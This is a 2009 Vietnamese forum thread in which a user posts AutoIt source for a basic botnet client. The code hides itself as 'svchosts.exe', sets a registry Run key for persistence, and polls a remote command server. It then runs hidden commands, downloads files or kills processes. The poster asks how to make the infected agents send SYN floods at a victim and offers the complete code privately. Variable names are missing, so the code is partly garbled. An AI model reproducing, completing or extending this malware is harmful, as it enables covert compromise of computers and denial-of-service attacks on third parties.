Code botnet căn bản [AutoIT]

Discussion in 'Bảo Mật - Security' started by ac7ive, Sep 1, 2009.

 1. Offline

  ac7ive

  • Knowledge Sharing

  Message Count:
  2,071
  Likes Received:
  358
  Trophy Points:
  83
  Hiện tại ac7ive đang ngồi "ngâm cứu" về mấy đoạn code botnet (căn bản thui nha :">).

  Code:
  #NoTrayIcon
  FileCopy(@ScriptFullPath, @SystemDir & "svchosts.exe", 1)
  RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun", "svchost", "REG_SZ", @SystemDir & "svchosts.exe")
   = "http://botnet.vn/test/run.txt"
  
  While (1)
    GetDr()
    ExCmd()
    Sleep(3000)
  WEnd
  
  Func GetDr()
    InetGet (, @WindowsDir & "run.txt", 1, 0)
     = FileOpen(@WindowsDir & "run.txt", 0)
    Global = FileReadLine()
    FileClose()
    FileDelete(@WindowsDir & "run.txt")
  EndFunc
  
  Func ExCmd()
    If StringInStr(, "#", 2) Then
       = StringSplit(, "#")
      If StringInStr(, "@#", 2) Then
        Run()
      Else
        Run(, "", @SW_HIDE)
      EndIf
      Sleep(7000)
    
    ElseIf StringInStr(, "$", 2) Then
       = StringSplit(, "$")
      InetGet (, , 0, 1)
      Sleep(7000)
  
    ElseIf StringInStr(, "!", 2) Then
       = StringSplit(, "!")
      Run("TASKKILL /F /IM " & & ".exe", "", @SW_HIDE)
      Sleep(7000)
      
    EndIf
  EndFunc
  
  Đang ngâm cứu thì bị bí đường. Chưa tìm ra cách send 1 gói SYN từ máy Agent đến Victim hay ít nhất là customize được những packet gửi đi . Đại hiệp nào biết thì chỉ giáo. Vì mới ngâm cứu + kiến thức lập trình hạn hẹp nên cũng chưa biết làm j tiếp theo :.

  vì thông tin tương đối nhạy cảm nên ac7ive chỉ send 1 phần code (1 phần sợ cái policy của diễn đàn hơi bị điên :|, ko biết ai xem dc và ai ko xem dc :|). Nếu đại hiệp nào muốn giúp và muốn tìm hiểu thêm thì liên hệ ac7ive qua yahoo để lấy code hoàn chỉnh :D
 2. Offline

  thanhbinh

  • Già làng về hưu !! - banned

  Message Count:
  92
  Likes Received:
  94
  Trophy Points:
  18
  ^^ thôi public full version đi anh, chắc cũng d.c 1 năm rồi ^^ code hết hiệu quả rồi. :D
 3. Offline

  ac7ive

  • Knowledge Sharing

  Message Count:
  2,071
  Likes Received:
  358
  Trophy Points:
  83
  lâu rùi cũng bỏ cái này nên chả nhớ j :))

Share This Page